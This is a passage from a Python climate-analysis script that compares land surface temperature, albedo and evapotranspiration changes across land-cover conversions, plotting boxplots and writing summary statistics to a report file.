extract_vals(\r\n\torig_class=herb, val=3, var=\"lst\", conv_name=\"lst_herb_to_shrub\"\r\n)\r\nlst_herb_to_sparse = extract_vals(\r\n\torig_class=herb, val=5, var=\"lst\", conv_name=\"lst_herb_to_sparse\"\r\n)\r\n# lst_herb_to_wetland = extract_vals(\r\n# orig_class=herb, val=6, var=\"lst\", conv_name=\"lst_herb_to_wetland\"\r\n# )\r\n\r\nlst_sparse_to_shrub = extract_vals(\r\n\torig_class=sparse, val=3, var=\"lst\", conv_name=\"lst_sparse_to_shrub\"\r\n)\r\nlst_sparse_to_herb = extract_vals(\r\n\torig_class=sparse, val=4, var=\"lst\", conv_name=\"lst_sparse_to_herb\"\r\n)\r\n# lst_sparse_to_water = extract_vals(orig_class=sparse,val= 7,var= \"lst\",conv_name= \"lst_sparse_to_water\")\r\n\r\nlst_wetland_to_sparse = extract_vals(\r\n\torig_class=wetland, val=5, var=\"lst\", conv_name=\"lst_wetland_to_sparse\"\r\n)\r\n\r\n# lst_water_to_sparse = extract_vals(\r\n# orig_class=water, val=5, var=\"lst\", conv_name=\"lst_water_to_sparse\"\r\n# )\r\n# lst_water_to_wetland = extract_vals(\r\n# orig_class=water, val=6, var=\"lst\", conv_name=\"lst_water_to_wetland\"\r\n# )\r\n\r\ndf_lst = pd.concat(\r\n\t[\r\n\t\tlst_EF_to_shrub,\r\n\t\tlst_EF_to_sparse,\r\n\t\t# lst_EF_to_herb,\r\n\t\t# lst_DF_to_shrub,\r\n\t\tlst_DF_to_herb,\r\n\t\tlst_DF_to_sparse,\r\n\t\tlst_shrub_to_sparse,\r\n\t\t# lst_shrub_to_wetland,\r\n\t\tlst_herb_to_shrub,\r\n\t\tlst_herb_to_sparse,\r\n\t\t# lst_herb_to_wetland,\r\n\t\tlst_sparse_to_shrub,\r\n\t\tlst_sparse_to_herb,\r\n\t\tlst_wetland_to_sparse,\r\n\t\t# lst_water_to_sparse,\r\n\t\t# lst_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\ndf_lst.columns = columns\r\nprint(f\"saving LST_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_lst,\r\n\ttitle=\"LST\",\r\n\tylabel=\"$\\Delta$ LST [C]\",\r\n\tmargin=0.3,\r\n\toutname=\"LST_Boxplot.png\",\r\n)\r\n\r\nalbedo_EF_to_shrub = extract_vals(EF, 3, \"albedo\", \"albedo_EF_to_shrub\")\r\n# albedo_EF_to_herb = extract_vals(EF, 4, \"albedo\", \"albedo_EF_to_herb\")\r\nalbedo_EF_to_sparse = extract_vals(EF, 5, \"albedo\", \"albedo_EF_to_sparse\")\r\n\r\n# albedo_DF_to_shrub = extract_vals(DF, 3, \"albedo\", \"albedo_DF_to_shrub\")\r\nalbedo_DF_to_herb = extract_vals(DF, 4, \"albedo\", \"albedo_DF_to_herb\")\r\nalbedo_DF_to_sparse = extract_vals(DF, 5, \"albedo\", \"albedo_DF_to_sparse\")\r\n\r\nalbedo_shrub_to_sparse = extract_vals(shrub, 5, \"albedo\", \"albedo_shrub_to_sparse\")\r\n# albedo_shrub_to_wetland = extract_vals(shrub, 6, \"albedo\", \"albedo_shrub_to_wetland\")\r\n\r\nalbedo_herb_to_shrub = extract_vals(herb, 3, \"albedo\", \"albedo_herb_to_shrub\")\r\nalbedo_herb_to_sparse = extract_vals(herb, 5, \"albedo\", \"albedo_herb_to_sparse\")\r\n# albedo_herb_to_wetland = extract_vals(herb, 6, \"albedo\", \"albedo_herb_to_wetland\")\r\n\r\nalbedo_sparse_to_shrub = extract_vals(sparse, 3, \"albedo\", \"albedo_sparse_to_shrub\")\r\nalbedo_sparse_to_herb = extract_vals(sparse, 4, \"albedo\", \"albedo_sparse_to_herb\")\r\n\r\nalbedo_wetland_to_sparse = extract_vals(\r\n\twetland, 5, \"albedo\", \"albedo_wetland_to_sparse\"\r\n)\r\n\r\n# albedo_water_to_sparse = extract_vals(water, 5, \"albedo\", \"albedo_water_to_sparse\")\r\n# albedo_water_to_wetland = extract_vals(water, 6, \"albedo\", \"albedo_water_to_wetland\")\r\n\r\ndf_albedo = pd.concat(\r\n\t[\r\n\t\talbedo_EF_to_shrub,\r\n\t\t# albedo_EF_to_herb,\r\n\t\talbedo_EF_to_sparse,\r\n\t\t# albedo_DF_to_shrub,\r\n\t\talbedo_DF_to_herb,\r\n\t\talbedo_DF_to_sparse,\r\n\t\talbedo_shrub_to_sparse,\r\n\t\t# albedo_shrub_to_wetland,\r\n\t\talbedo_herb_to_shrub,\r\n\t\talbedo_herb_to_sparse,\r\n\t\t# albedo_herb_to_wetland,\r\n\t\talbedo_sparse_to_shrub,\r\n\t\talbedo_sparse_to_herb,\r\n\t\talbedo_wetland_to_sparse,\r\n\t\t# albedo_water_to_sparse,\r\n\t\t# albedo_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\ndf_albedo.columns = columns\r\nprint(f\"saving Albedo_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_albedo,\r\n\ttitle=\"Albedo\",\r\n\tylabel=\"$\\Delta$ Albedo\",\r\n\tmargin=0.005,\r\n\toutname=\"Albedo_boxplot.png\",\r\n)\r\n\r\nET_EF_to_shrub = extract_vals(EF, 3, \"et\", \"ET_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nET_EF_to_sparse = extract_vals(EF, 5, \"et\", \"ET_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nET_DF_to_herb = extract_vals(DF, 4, \"et\", \"ET_DF_to_herb\")\r\nET_DF_to_sparse = extract_vals(DF, 5, \"et\", \"ET_DF_to_sparse\")\r\n\r\nET_shrub_to_sparse = extract_vals(shrub, 5, \"et\", \"ET_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nET_herb_to_shrub = extract_vals(herb, 3, \"et\", \"ET_herb_to_shrub\")\r\nET_herb_to_sparse = extract_vals(herb, 5, \"et\", \"ET_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nET_sparse_to_shrub = extract_vals(sparse, 3, \"et\", \"ET_sparse_to_shrub\")\r\nET_sparse_to_herb = extract_vals(sparse, 4, \"et\", \"ET_sparse_to_herb\")\r\n\r\nET_wetland_to_sparse = extract_vals(wetland, 5, \"et\", \"ET_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_et = pd.concat(\r\n\t[\r\n\t\tET_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tET_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tET_DF_to_herb,\r\n\t\tET_DF_to_sparse,\r\n\t\tET_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tET_herb_to_shrub,\r\n\t\tET_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tET_sparse_to_shrub,\r\n\t\tET_sparse_to_herb,\r\n\t\tET_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_et.columns = columns\r\nprint(f\"saving ET_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\t\r\n\tdf=df_et,\r\n\ttitle=\"ET\",\r\n\tylabel=\"$\\Delta$ ET [mm/year]\",\r\n\tmargin=5,\r\n\toutname=\"ET_boxplot.png\",\r\n)\r\n\r\ndf1 = {\r\n\t\"name\": \"LST\",\r\n\t\"df\": df_lst,\r\n\t\"label\": \"$\\Delta$LST [C]\",\r\n\t\"ylim\": [-12, 12]\r\n\t}\r\ndf2 = {\r\n\t\"name\": \"Albedo\",\r\n\t\"df\": df_albedo,\r\n\t\"label\": \"$\\Delta$Albedo\",\r\n\t\"ylim\": [-0.5, 0.5],\r\n\t}\r\ndf3 = {\r\n\t\"name\": \"ET\",\r\n\t\"df\": df_et, \r\n\t\"label\": \"$\\Delta$ET [mm/year]\", \r\n\t\"ylim\": [-850, 850]\r\n\t}\r\nprint(f\"saving Boxplot_groups.png in {fig_dir}\")\r\nmyboxplot_group(df1, df2, df3, columns=columns, txt_pos=9, outname=\"Boxplot_groups.png\")\r\n\r\ndf_lst_mean = df_lst.mean()\r\ndf_albedo_mean = df_albedo.mean()\r\ndf_et_mean = df_et.mean()\r\ndf_lst_std = df_lst.std()\r\ndf_albedo_std = df_albedo.std()\r\ndf_et_std = df_et.std()\r\n\r\nframes = pd.concat([df_lst_mean,df_albedo_mean,df_et_mean,df_lst_std,df_albedo_std,df_et_std],axis=1)\r\nframes.columns = [\"LST Mean\",\"Albedo Mean\",\"ET Mean\",\"LST STD\",\"Albedo STD\",\"ET STD\"]\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"a\") as text_file:\r\n print(\"\\n Mean and STD of the LST, albedo and ET aftr LUC conversion:\",\r\n file=text_file,\r\n )\r\n print(frames, file=text_file)\r\ntext_file.close()\r\nprint(\"Mean and STD of the LST, albedo and ET after LUC conversion:\")\r\nprint(frames)\r\n\r\n\"\"\"---------------------------------------------------------------------------\r\n\t\t\t\t\tAnalyzing energy vs. water limited \r\n------------------------------------------------------------------------------\"\"\"\r\n\r\nprint('----------------- Working on the energy vs water limited -----------------\\n')\r\n# class_name = [\"High_WL\", \"Moderate_WL\", \"Low_WL\", \"Low_EL\", \"High_EL\"]\r\nclass_name = [\"Water_Limited\", \"Energy_limited\"]\r\n\r\nprint(\"Extracting EF to Sparse energy vs. water limited LST, albedo and ET\\n\")\r\n# EF to sparse conversion which we have enough data for EL_EL analyses\r\nlst_EL_WL, albedo_EL_WL, et_EL_WL = extract_wl_el(\r\n\torig_class=EF, val=5\r\n) # There are enough data\r\ndf1 = {\"name\": \"LST\", \"df\": lst_EL_WL, \"label\": \"$\\Delta$LST [C]\", \"ylim\": [-12, 12]}\r\ndf2 = {\r\n\t\"name\": \"Albedo\",\r\n\t\"df\": albedo_EL_WL,\r\n\t\"label\": \"$\\Delta$Albedo\",\r\n\t\"ylim\": [-0.5, 0.5],\r\n}\r\ndf3 = {\r\n\t\"name\": \"ET\",\r\n\t\"df\": et_EL_WL,\r\n\t\"label\": \"$\\Delta$ET [mm/year]\",\r\n\t\"ylim\": [-850, 850],\r\n}\r\nprint(f\"saving EF_sparse_EL_WL.png in {fig_dir}\")\r\nmyboxplot_group(\r\n\tdf1, df2, df3, columns=class_name, txt_pos=9, outname=\"EF_sparse_EL_WL.png\"\r\n)\r\nlst_mean=lst_EL_WL.mean()\r\nalbedo_mean=albedo_EL_WL.mean()\r\net_mean=et_EL_WL.mean()\r\nlst_std=lst_EL_WL.std()\r\nalbedo_std=albedo_EL_WL.std()\r\net_std=et_EL_WL.std()\r\n\r\nef_sparse_el_wl_df = pd.concat([lst_mean,albedo_mean,et_mean,lst_std,albedo_std,et_std],axis=1)\r\nef_sparse_el_wl_df.columns = ['LST Mean','Albedo Mean','ET Mean','LST STD','Albedo STD','ET STD']\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"a\") as text_file:\r\n print(\"\\n Mean and STD of water vs. energy limited LST, albedo and ET for EF to sparse conversion:\",\r\n file=text_file,\r\n )\r\n print(ef_sparse_el_wl_df, file=text_file)\r\ntext_file.close()\r\n\r\n# extract_wl_el(orig_class=EF, val=3, outname=\"EF_shrub_EL_WL.png\") # Not enough data\r\n# extract_wl_el(orig_class=DF, val=5, outname=\"DF_sparse_EL_WL.png\") # Not enough data\r\n# extract_wl_el(orig_class=DF, val=4, outname=\"DF_herb_EL_WL.png\") # Not enough data\r\n# extract_wl_el(\r\n# \torig_class=shrub, val=5, outname=\"Shrub_sparse_EL_WL.png\"\r\n# ) # Not enough data\r\n\r\nprint(\"Extracting Herbaceous to Sparse energy vs. water limited LST, albedo and ET\\n\")\r\n# Herb to sparse conversion which we have enought data to analyze\r\nlst_EL_WL, albedo_EL_WL, et_EL_WL = extract_wl_el(\r\n\torig_class=herb, val=5\r\n) # There are enough data\r\n\r\ndf1 = {\"name\": \"LST\", \"df\": lst_EL_WL, \"label\": \"$\\Delta$LST [C]\", \"ylim\": [-12, 12]}\r\ndf2 = {\r\n\t\"name\": \"Albedo\",\r\n\t\"df\": albedo_EL_WL,\r\n\t\"label\": \"$\\Delta$Albedo\",\r\n\t\"ylim\": [-0.5, 0.5],\r\n}\r\ndf3 = {\r\n\t\"name\": \"ET\",\r\n\t\"df\": et_EL_WL,\r\n\t\"label\": \"$\\Delta$ET [mm/year]\",\r\n\t\"ylim\": [-850, 850],\r\n}\r\nprint(f\"saving Herb_sparse_EL_WL.png in {fig_dir}\")\r\nmyboxplot_group(\r\n\tdf1, df2, df3, columns=class_name, txt_pos=9, outname=\"Herb_sparse_EL_WL.png\"\r\n)\r\n\r\nlst_mean=lst_EL_WL.mean()\r\nalbedo_mean=albedo_EL_WL.mean()\r\net_mean=et_EL_WL.mean()\r\nlst_std=lst_EL_WL.std()\r\nalbedo_std=albedo_EL_WL.std()\r\net_std=et_EL_WL.std()\r\n\r\nherb_sparse_el_wl_df = pd.concat([lst_mean,albedo_mean,et_mean,lst_std,albedo_std,et_std],axis=1)\r\nherb_sparse_el_wl_df.columns = ['LST Mean','Albedo Mean','ET Mean','LST STD','Albedo STD','ET STD']\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"a\") as text_file:\r\n print(\"\\n Mean and STD of water vs. energy limited LST, albedo and ET for herb to sparse conversion:\",\r\n file=text_file,\r\n )\r\n print(herb_sparse_el_wl_df, file=text_file)\r\ntext_file.close()\r\n\r\n# extract_wl_el(\r\n# \torig_class=sparse, val=3, outname=\"Sparse_shrub_EL_WL.png\"\r\n# ) # Not enough data\r\n# extract_wl_el(\r\n# \torig_class=sparse, val=4, outname=\"Sparse_herb_EL_WL.png\"\r\n# ) # Not enough data\r\n# extract_wl_el(\r\n# \torig_class=wetland, val=5, outname=\"Wetland_sparse_EL_WL.png\"\r\n# ) # Not enough data\r\n\r\n\r\n\"\"\"---------------------------------------------------------------------------\r\n\r\n\t\t\t\t\tNow we focus on different components of the ET \r\n\r\n------------------------------------------------------------------------------\"\"\"\r\nprint('----------------- Plotting ET component -----------------\\n')\r\nEC_EF_to_shrub = extract_vals(EF, 3, \"ec\", \"EC_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nEC_EF_to_sparse = extract_vals(EF, 5, \"ec\", \"EC_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nEC_DF_to_herb = extract_vals(DF, 4, \"ec\", \"EC_DF_to_herb\")\r\nEC_DF_to_sparse = extract_vals(DF, 5, \"ec\", \"EC_DF_to_sparse\")\r\n\r\nEC_shrub_to_sparse = extract_vals(shrub, 5, \"ec\", \"EC_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nEC_herb_to_shrub = extract_vals(herb, 3, \"ec\", \"EC_herb_to_shrub\")\r\nEC_herb_to_sparse = extract_vals(herb, 5, \"ec\", \"EC_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nEC_sparse_to_shrub = extract_vals(sparse, 3, \"ec\", \"EC_sparse_to_shrub\")\r\nEC_sparse_to_herb = extract_vals(sparse, 4, \"ec\", \"EC_sparse_to_herb\")\r\n\r\nEC_wetland_to_sparse = extract_vals(wetland, 5, \"ec\", \"EC_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_ec = pd.concat(\r\n\t[\r\n\t\tEC_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tEC_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tEC_DF_to_herb,\r\n\t\tEC_DF_to_sparse,\r\n\t\tEC_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tEC_herb_to_shrub,\r\n\t\tEC_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tEC_sparse_to_shrub,\r\n\t\tEC_sparse_to_herb,\r\n\t\tEC_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_ec.columns = columns\r\nprint(f\"saving EC_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_ec,\r\n\ttitle=\"EC\",\r\n\tylabel=\"EC [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"EC_Boxplot.png\",\r\n)\r\n\r\n\r\nES_EF_to_shrub = extract_vals(EF, 3, \"es\", \"ES_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nES_EF_to_sparse = extract_vals(EF, 5, \"es\", \"ES_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nES_DF_to_herb = extract_vals(DF, 4, \"es\", \"ES_DF_to_herb\")\r\nES_DF_to_sparse = extract_vals(DF, 5, \"es\", \"ES_DF_to_sparse\")\r\n\r\nES_shrub_to_sparse = extract_vals(shrub, 5, \"es\", \"ES_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nES_herb_to_shrub = extract_vals(herb, 3, \"es\", \"ES_herb_to_shrub\")\r\nES_herb_to_sparse = extract_vals(herb, 5, \"es\", \"ES_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nES_sparse_to_shrub = extract_vals(sparse, 3, \"es\", \"ES_sparse_to_shrub\")\r\nES_sparse_to_herb = extract_vals(sparse, 4, \"es\", \"ES_sparse_to_herb\")\r\n\r\nES_wetland_to_sparse = extract_vals(wetland, 5, \"es\", \"ES_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_es = pd.concat(\r\n\t[\r\n\t\tES_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tES_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tES_DF_to_herb,\r\n\t\tES_DF_to_sparse,\r\n\t\tES_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tES_herb_to_shrub,\r\n\t\tES_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tES_sparse_to_shrub,\r\n\t\tES_sparse_to_herb,\r\n\t\tES_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_es.columns = columns\r\nprint(f\"saving ES_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_es,\r\n\ttitle=\"ES\",\r\n\tylabel=\"ES [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"ES_Boxplot.png\",\r\n)\r\n\r\n\r\nEW_EF_to_shrub = extract_vals(EF, 3, \"ew\", \"EW_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nEW_EF_to_sparse = extract_vals(EF, 5, \"ew\", \"EW_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nEW_DF_to_herb = extract_vals(DF, 4, \"ew\", \"EW_DF_to_herb\")\r\nEW_DF_to_sparse = extract_vals(DF, 5, \"ew\", \"EW_DF_to_sparse\")\r\n\r\nEW_shrub_to_sparse = extract_vals(shrub, 5, \"ew\", \"EW_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nEW_herb_to_shrub = extract_vals(herb, 3, \"ew\", \"EW_herb_to_shrub\")\r\nEW_herb_to_sparse = extract_vals(herb, 5, \"ew\", \"EW_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nEW_sparse_to_shrub = extract_vals(sparse, 3, \"ew\", \"EW_sparse_to_shrub\")\r\nEW_sparse_to_herb = extract_vals(sparse, 4, \"ew\", \"EW_sparse_to_herb\")\r\n\r\nEW_wetland_to_sparse = extract_vals(wetland, 5, \"ew\", \"EW_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_ew = pd.concat(\r\n\t[\r\n\t\tEW_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tEW_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tEW_DF_to_herb,\r\n\t\tEW_DF_to_sparse,\r\n\t\tEW_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tEW_herb_to_shrub,\r\n\t\tEW_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tEW_sparse_to_shrub,\r\n\t\tEW_sparse_to_herb,\r\n\t\tEW_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_ew.columns = columns\r\nprint(f\"saving EW_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_ew,\r\n\ttitle=\"EW\",\r\n\tylabel=\"EW [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"EW_Boxplot.png\",\r\n)\r\n\r\nECI_EF_to_shrub = extract_vals(EF, 3, \"eci\", \"ECI_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nECI_EF_to_sparse = extract_vals(EF, 5, \"eci\", \"ECI_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nECI_DF_to_herb = extract_vals(DF, 4, \"eci\", \"ECI_DF_to_herb\")\r\nECI_DF_to_sparse = extract_vals(DF, 5, \"eci\", \"ECI_DF_to_sparse\")\r\n\r\nECI_shrub_to_sparse = extract_vals(shrub, 5, \"eci\", \"ECI_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nECI_herb_to_shrub = extract_vals(herb, 3, \"eci\", \"ECI_herb_to_shrub\")\r\nECI_herb_to_sparse = extract_vals(herb, 5, \"eci\", \"ECI_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nECI_sparse_to_shrub = extract_vals(sparse, 3, \"eci\", \"ECI_sparse_to_shrub\")\r\nECI_sparse_to_herb = extract_vals(sparse, 4, \"eci\", \"ECI_sparse_to_herb\")\r\n\r\nECI_wetland_to_sparse = extract_vals(wetland, 5, \"eci\", \"ECI_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_eci = pd.concat(\r\n\t[\r\n\t\tECI_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tECI_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tECI_DF_to_herb,\r\n\t\tECI_DF_to_sparse,\r\n\t\tECI_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tECI_herb_to_shrub,\r\n\t\tECI_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tECI_sparse_to_shrub,\r\n\t\tECI_sparse_to_herb,\r\n\t\tECI_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_eci.columns = columns\r\nprint(f\"saving ECI_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_eci,\r\n\ttitle=\"ECI\",\r\n\tylabel=\"ECI [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"ECI_Boxplot.png\",\r\n)\r\n\r\nESW_EF_to_shrub = extract_vals(EF, 3, \"esw\", \"ESW_EF_to_shrub\")\r\n# ET_EF_to_herb = extract_vals(EF, 4, \"et\", \"ET_EF_to_herb\")\r\nESW_EF_to_sparse = extract_vals(EF, 5, \"esw\", \"ESW_EF_to_sparse\")\r\n\r\n# ET_DF_to_shrub = extract_vals(DF, 3, \"et\", \"ET_DF_to_shrub\")\r\nESW_DF_to_herb = extract_vals(DF, 4, \"esw\", \"ESW_DF_to_herb\")\r\nESW_DF_to_sparse = extract_vals(DF, 5, \"esw\", \"ESW_DF_to_sparse\")\r\n\r\nESW_shrub_to_sparse = extract_vals(shrub, 5, \"esw\", \"ESW_shrub_to_sparse\")\r\n# ET_shrub_to_wetland = extract_vals(shrub, 6, \"et\", \"ET_shrub_to_wetland\")\r\n\r\nESW_herb_to_shrub = extract_vals(herb, 3, \"esw\", \"ESW_herb_to_shrub\")\r\nESW_herb_to_sparse = extract_vals(herb, 5, \"esw\", \"ESW_herb_to_sparse\")\r\n# ET_herb_to_wetland = extract_vals(herb, 6, \"et\", \"ET_herb_to_wetland\")\r\n\r\nESW_sparse_to_shrub = extract_vals(sparse, 3, \"esw\", \"ESW_sparse_to_shrub\")\r\nESW_sparse_to_herb = extract_vals(sparse, 4, \"esw\", \"ESW_sparse_to_herb\")\r\n\r\nESW_wetland_to_sparse = extract_vals(wetland, 5, \"esw\", \"ESW_wetland_to_sparse\")\r\n\r\n# ET_water_to_sparse = extract_vals(water, 5, \"et\", \"ET_water_to_sparse\")\r\n# ET_water_to_wetland = extract_vals(water, 6, \"et\", \"ET_water_to_wetland\")\r\n\r\ndf_esw = pd.concat(\r\n\t[\r\n\t\tESW_EF_to_shrub,\r\n\t\t# ET_EF_to_herb,\r\n\t\tESW_EF_to_sparse,\r\n\t\t# ET_DF_to_shrub,\r\n\t\tESW_DF_to_herb,\r\n\t\tESW_DF_to_sparse,\r\n\t\tESW_shrub_to_sparse,\r\n\t\t# ET_shrub_to_wetland,\r\n\t\tESW_herb_to_shrub,\r\n\t\tESW_herb_to_sparse,\r\n\t\t# ET_herb_to_wetland,\r\n\t\tESW_sparse_to_shrub,\r\n\t\tESW_sparse_to_herb,\r\n\t\tESW_wetland_to_sparse,\r\n\t\t# ET_water_to_sparse,\r\n\t\t# ET_water_to_wetland,\r\n\t],\r\n\tignore_index=True,\r\n\taxis=1,\r\n)\r\n\r\ndf_esw.columns = columns\r\nprint(f\"saving ESW_Boxplot.png in {fig_dir}\")\r\nmyboxplot(\r\n\tdf=df_esw,\r\n\ttitle=\"ESW\",\r\n\tylabel=\"ESW [mm $year^{-1}$]\",\r\n\tmargin=5,\r\n\toutname=\"ESW_Boxplot.png\",\r\n)\r\n\r\ndf1 = {\r\n\t\"name\": \"CI\",\r\n\t\"df\": df_eci,\r\n\t\"label\": \"$\\Delta$CI [mm/year]]\",\r\n\t\"ylim\": [-300, 300],\r\n}\r\ndf2 = {\r\n\t\"name\": \"SW\",\r\n\t\"df\": df_esw,\r\n\t\"label\": \"$\\Delta$SW [mm/year]]\",\r\n\t\"ylim\": [-300, 300],\r\n}\r\n\r\ndf3 = {\"name\": \"ET\", \"df\": df_et, \"label\": \"$\\Delta$ET [mm/year]]\", \"ylim\": [-850, 850],}\r\nmyboxplot_group(\r\n\tdf1, df2, df3, columns=columns, txt_pos=200, outname=\"ET_Components_integrated.png\"\r\n)\r\n\r\ndf_eci_mean = df_eci.mean()\r\ndf_esw_mean = df_esw.mean()\r\ndf_et_mean = df_et.mean()\r\ndf_eci_std = df_eci.std()\r\ndf_esw_std = df_esw.std()\r\ndf_et_std = df_et.std()\r\n\r\nframes = pd.concat([df_eci_mean,df_esw_mean,df_et_mean,df_eci_std,df_esw_std,df_et_std],axis=1)\r\nframes.columns = [\"ECI Mean\",\"ESW Mean\",\"ET Mean\",\"ECI STD\",\"ESW STD\",\"ET STD\"]\r\n\r\nwith open(out_dir +analyses_mode+\"_report.txt\", \"a\") as text_file:\r\n print(\"\\n Mean and STD of ET components for different LUC conversions:\",\r\n file=text_file,\r\n )\r\n print(frames, file=text_file)\r\ntext_file.close()\r\nprint(\"Mean and STD of ET components for different LUC conversions:\")\r\nprint(frames)\r\n\r\n\"\"\" ------------------------------------------------------------------\r\nAnalyzing an 